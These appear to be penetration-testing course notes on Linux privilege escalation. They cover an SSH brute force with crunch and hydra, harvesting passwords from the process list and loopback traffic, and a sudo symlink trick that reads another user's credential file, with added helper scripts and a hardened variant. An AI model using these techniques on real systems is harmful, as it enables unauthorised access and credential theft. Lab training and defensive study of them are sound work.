Exposed Confidential Information
18.3.1 - Inspecting user trails
Inspecting environment variables
env
Inspecting bashrc
cat ~/.bashrc
Create a simple wordlist for a brute-force attack. crunch takes a minimum and maximum length (6 and 6 here) and a template; in the template % stands for a digit, so the output is Lab000, Lab001, ... Lab999 (1000 six-character candidates, matching the case of the literal "Lab").
crunch 6 6 -t Lab%%% > wordlist
Feed the wordlist to hydra against SSH for a single user (-l eve), 4 parallel tasks (-t 4), printing every attempt (-V).
hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V
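An added example, not part of the course material: a small shell re-implementation of the crunch -t placeholders, so the template above can be inspected and counted before hydra is pointed at a host. The placeholder rules for @ (lowercase), , (uppercase) and % (digit) follow crunch; the ^ symbol class is left out for brevity. The function names expand_template and count_candidates are my own.

```shell
#!/usr/bin/env bash
# Added example: re-implements crunch's -t template expansion in plain shell.
#   @ lowercase letter, , uppercase letter, % digit; any other character is literal.
# (crunch's ^ symbol placeholder is omitted to keep the example short.)

LOWER=abcdefghijklmnopqrstuvwxyz
UPPER=ABCDEFGHIJKLMNOPQRSTUVWXYZ
DIGIT=0123456789

# expand_template TEMPLATE [PREFIX]
# Recursively expands TEMPLATE, printing one candidate per line in crunch order.
expand_template() {
  local tpl="$1" prefix="$2" first rest chars c
  if [ -z "$tpl" ]; then
    printf '%s\n' "$prefix"
    return 0
  fi
  rest="${tpl#?}"            # everything after the first character
  first="${tpl%"$rest"}"     # the first character itself
  case "$first" in
    '@') chars="$LOWER" ;;
    ',') chars="$UPPER" ;;
    '%') chars="$DIGIT" ;;
    *)   expand_template "$rest" "$prefix$first"; return 0 ;;   # literal
  esac
  # Try every character of the chosen class in this position.
  while [ -n "$chars" ]; do
    c="${chars%"${chars#?}"}"
    chars="${chars#?}"
    expand_template "$rest" "$prefix$c"
  done
}

# count_candidates TEMPLATE: how many passwords the template yields,
# i.e. how many SSH attempts hydra will make per user.
count_candidates() {
  expand_template "$1" | wc -l | tr -d ' '
}

# Usage, equivalent to the crunch line above:
#   expand_template 'Lab%%%' > wordlist
#   hydra -l eve -P wordlist 192.168.50.214 -t 4 ssh -V
```

Counting first is worth the second it takes: 'Lab%%%' is 1000 candidates, but '@@@%%%' is already 17,576,000, which SSH with four threads will not finish in a lab session.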
18.3.2 - Inspecting service footprints
Re-run ps every second and grep for "pass": credentials passed as command-line arguments (to a database client, a cron job, a backup script) appear in the process list, and on most systems other users' arguments are visible too, so this can harvest credentials from processes that only live for a moment.
watch -n 1 "ps -aux | grep pass"
Sniff passwords on the loopback interface: services that talk to each other locally (a web app authenticating to its database or LDAP, for example) often do so in cleartext. -A prints each packet as ASCII so grep can match on it; root is needed to capture.
sudo tcpdump -i lo -A | grep "pass"
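An added example, not from the course: the watch/ps and tcpdump/grep one-liners above as reusable functions with a slightly broader, case-insensitive match, so that a -pPassw0rd argument or an HTTP Basic header is not missed by a plain grep "pass". The regexes, the function names and the sample process list and capture text are my own constructions.

```shell
#!/usr/bin/env bash
# Added example: credential harvesting from the process list and from a
# tcpdump -A text stream, with constructed fixtures so it runs without root.

# Things that commonly carry a secret on a command line. Broad on purpose:
# a false positive costs nothing here.
CMDLINE_REGEX='pass|pwd|secret|token|(^| )-p[^ ]'
# Things that carry a secret in cleartext protocols as tcpdump -A prints them.
CAPTURE_REGEX='(pass(w(or)?d)?|pwd)[=: ]|^PASS |Authorization: Basic'

# scan_cmdlines [PROCDIR]: one pass over /proc/<pid>/cmdline (what ps reads
# underneath). Arguments are NUL-separated there, so NULs become spaces first.
scan_cmdlines() {
  local procdir="${1:-/proc}" f pid cmd
  for f in "$procdir"/[0-9]*/cmdline; do
    [ -r "$f" ] || continue
    pid="${f#"$procdir"/}"
    pid="${pid%/cmdline}"
    cmd="$(tr '\000' ' ' < "$f" 2>/dev/null)"
    if printf '%s' "$cmd" | grep -qiE "$CMDLINE_REGEX"; then
      printf '%s %s\n' "$pid" "$cmd"
    fi
  done
  return 0
}

# poll_cmdlines [INTERVAL] [PROCDIR]: like watch, but prints each new hit once
# instead of redrawing the screen, so nothing scrolls away. Ctrl-C to stop.
poll_cmdlines() {
  local interval="${1:-1}" procdir="${2:-/proc}" seen='' line
  while :; do
    while IFS= read -r line; do
      [ -n "$line" ] || continue
      case "$seen" in
        *"|$line|"*) ;;                                   # already reported
        *) seen="$seen|$line|"; printf '%s\n' "$line" ;;
      esac
    done <<EOF
$(scan_cmdlines "$procdir")
EOF
    sleep "$interval"
  done
}

# scan_capture: filter tcpdump -A text on stdin, e.g.
#   sudo tcpdump -i lo -A -l | scan_capture
scan_capture() {
  grep -iE "$CAPTURE_REGEX" || true
}

# make_fake_proc: constructed /proc look-alike (two fake pids) for trying
# scan_cmdlines without root; prints the directory it created.
make_fake_proc() {
  local d
  d="$(mktemp -d)"
  mkdir "$d/1234" "$d/5678"
  printf 'mysql\000-u\000root\000-pS3cret\000' > "$d/1234/cmdline"   # constructed
  printf 'sleep\000100\000' > "$d/5678/cmdline"                       # constructed
  printf '%s\n' "$d"
}

# Constructed sample of what tcpdump -A shows for an HTTP form login,
# an HTTP Basic header and an FTP login on the loopback interface.
SAMPLE_CAPTURE='GET /login HTTP/1.1
Host: 127.0.0.1
user=bob&password=hunter2
Authorization: Basic Ym9iOmh1bnRlcjI=
PASS letmein
220 ftp ready'

# count_capture_hits: number of SAMPLE_CAPTURE lines that look like credentials.
count_capture_hits() {
  printf '%s\n' "$SAMPLE_CAPTURE" | scan_capture | wc -l | tr -d ' '
}
```

Reading /proc directly instead of ps also works on minimal containers that ship without procps. Polling at one-second intervals still misses very short-lived processes; on a box where you already have root, auditd or `execsnoop` catch every exec, but at that point you no longer need the credentials.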
18.3.3 - Service Exploits
Services are simply programs running in the background, accepting input or performing regular tasks. If a vulnerable service runs as root, exploiting it yields command execution as root. Public exploits for a given service and version can be found with searchsploit, Google and GitHub.
See 12.3 - Offline Exploit Resources for more.
18.3.4 - Making a symbolic link
An example of a symbolic link (essentially an alias for another file) used to trick a custom script (/usr/bin/sync.sh) that sudo lets us run as m.sander. The script acts on whatever path it is handed and follows the link, so pointing the link at a file only m.sander can read makes the script process that file with m.sander's privileges, and whatever the script does with its input (copy, print, sync) exposes the contents to us.
ln -sf /home/m.sander/personal/creds-for-2022.txt fk_this_box
sudo -u m.sander /usr/bin/sync.sh fk_this_box
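An added example, not the page's sync.sh: a hypothetical "sync" step that copies the file it is handed, written first the naive way and then hardened against the symlink trick above, with a constructed fixture that rebuilds the ln/sudo scenario in a scratch directory. Since a single user plays both roles here, only the symlink-following is demonstrated, not the uid change that sudo -u provides. The function names and the sample credential are my own.

```shell
#!/usr/bin/env bash
# Added example: why a sudo-able script that trusts its path argument leaks
# files through symlinks, and the check that stops the cheap version of it.

# Naive: whatever path the caller passes is opened, symlink or not.
# This is the assumed behaviour of a sync.sh-style script, not its real code.
sync_naive() {
  cat -- "$1" > "$2"
}

# Hardened: refuse symbolic links and anything that is not a regular file
# before opening it. Still check-then-open (racy), see the note below.
sync_safe() {
  local src="$1" dst="$2"
  if [ -L "$src" ]; then
    printf 'refusing symbolic link: %s\n' "$src" >&2
    return 1
  fi
  if [ ! -f "$src" ]; then
    printf 'not a regular file: %s\n' "$src" >&2
    return 1
  fi
  cat -- "$src" > "$dst"
}

# demo_symlink_abuse: rebuild the ln/sudo scenario in a scratch directory and
# report what each variant does. Prints "<leaked content>|<refused or leaked>".
demo_symlink_abuse() {
  local dir naive safe
  dir="$(mktemp -d)"
  mkdir "$dir/personal"
  # constructed stand-in for /home/m.sander/personal/creds-for-2022.txt
  printf 'm.sander:CONSTRUCTED_SAMPLE_SECRET\n' > "$dir/personal/creds-for-2022.txt"
  ln -sf "$dir/personal/creds-for-2022.txt" "$dir/fk_this_box"
  naive="$(sync_naive "$dir/fk_this_box" "$dir/out1" && cat "$dir/out1")"
  if sync_safe "$dir/fk_this_box" "$dir/out2" 2>/dev/null; then
    safe=leaked
  else
    safe=refused
  fi
  rm -rf "$dir"
  printf '%s|%s\n' "$naive" "$safe"
}
```

The -L test closes the door shown on this page, but a determined attacker can swap a regular file for a symlink between the check and the cat (a TOCTOU race). The durable fix is on the sudo side: do not let a rule pass user-controlled paths to a script that runs as someone else, or have the script open its input with O_NOFOLLOW and drop privileges first.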